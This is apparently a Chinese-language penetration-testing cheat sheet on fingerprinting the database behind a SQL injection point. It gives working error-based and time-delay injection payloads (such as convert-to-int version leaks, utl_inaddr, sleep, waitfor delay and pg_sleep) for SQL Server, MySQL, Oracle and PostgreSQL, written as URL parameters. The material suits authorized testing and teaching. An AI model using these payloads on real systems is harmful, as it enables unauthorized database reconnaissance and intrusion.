sql注入之判断数据库

1.通过运算符(也可以将符号改为url编码)

sql server:   select 'a'+'b'   （URL 中写成 a'%2b'b：`+` 在查询串里会被解码成空格，必须编码为 %2b）
mysql:   select 'a' 'b'（相邻字符串字面量自动拼接，空格编码为 %20）或者 select concat('a','b')
oracle: select 'a' || 'b' 或者 select concat('a','b')（Oracle 的 concat 只接受两个参数）
postgresql: select 'a' || 'b' 或者 select concat('a','b')

2.通过错误消息判断

sqlserver
and 1 in(select @@version) --
and 1=convert(int,(select @@version)) --   （转换失败时错误信息会直接带出版本字符串）
www.example.com/a.php?id=1/is_srvrolemember('sysadmin')   （当前用户不是 sysadmin 时函数返回 0，触发除零错误）


mysql
and(select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#


oracle
and 1=(utl_inaddr.get_host_name((select banner from v$version where rownum=1))) --   （需要对 UTL_INADDR 有执行权限，11g 起受 ACL 限制）
and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1)) --


postgresql
and 1=cast((select version())::text as numeric)--

3.通过时间延迟

mysql: www.example.com/a.php?id=1 and sleep(5)-- 或者使用 benchmark(count,expr)，如 benchmark(5000000,md5(1))（MySQL 在 PHP mysql_query 下通常不支持堆叠查询，用 and/or 拼接而非分号）
sqlserver: www.example.com/a.php?id=1;waitfor delay '0:0:5';-- 或者条件延时 ;if (system_user='sa') waitfor delay '0:0:5'--
oracle: www.example.com/a.php?id=1 or 1=dbms_pipe.receive_message('RDS',10)   （10 为超时秒数；需要对 DBMS_PIPE 的执行权限）
postgresql: www.example.com/a.php?id=1;select pg_sleep(10);-- 或者不依赖堆叠查询的 and 1=(select 1 from pg_sleep(10))

4.通过强制类型转换运算符

sql server:  SELECT CAST('123' AS varchar)   （未指定长度时默认 varchar(30)）
mysql:   SELECT CAST('123' AS char)
oracle: SELECT CAST(1 AS varchar2(10)) FROM dual   （Oracle 要求 CAST 到 VARCHAR2 时给出长度，否则报 ORA-00906）
postgresql: SELECT CAST(123 AS text) 或者 SELECT 123::text

5.通过特定函数

sql server:  select @@version   （@@ 与 version 之间不能有空格）
mysql:   select version()  或者  select @@version
oracle: select banner from v$version  或者 select banner from v$version where rownum=1
postgresql: select version()

6.通过注释符：MySQL 支持 `#`、`-- `（减号后必须跟空格）以及 `/*! ... */` 版本条件注释；SQL Server、Oracle、PostgreSQL 只识别 `--` 与 `/* */`。哪种注释符能让语句正常执行，本身就是指纹。

7.上各种识别工具
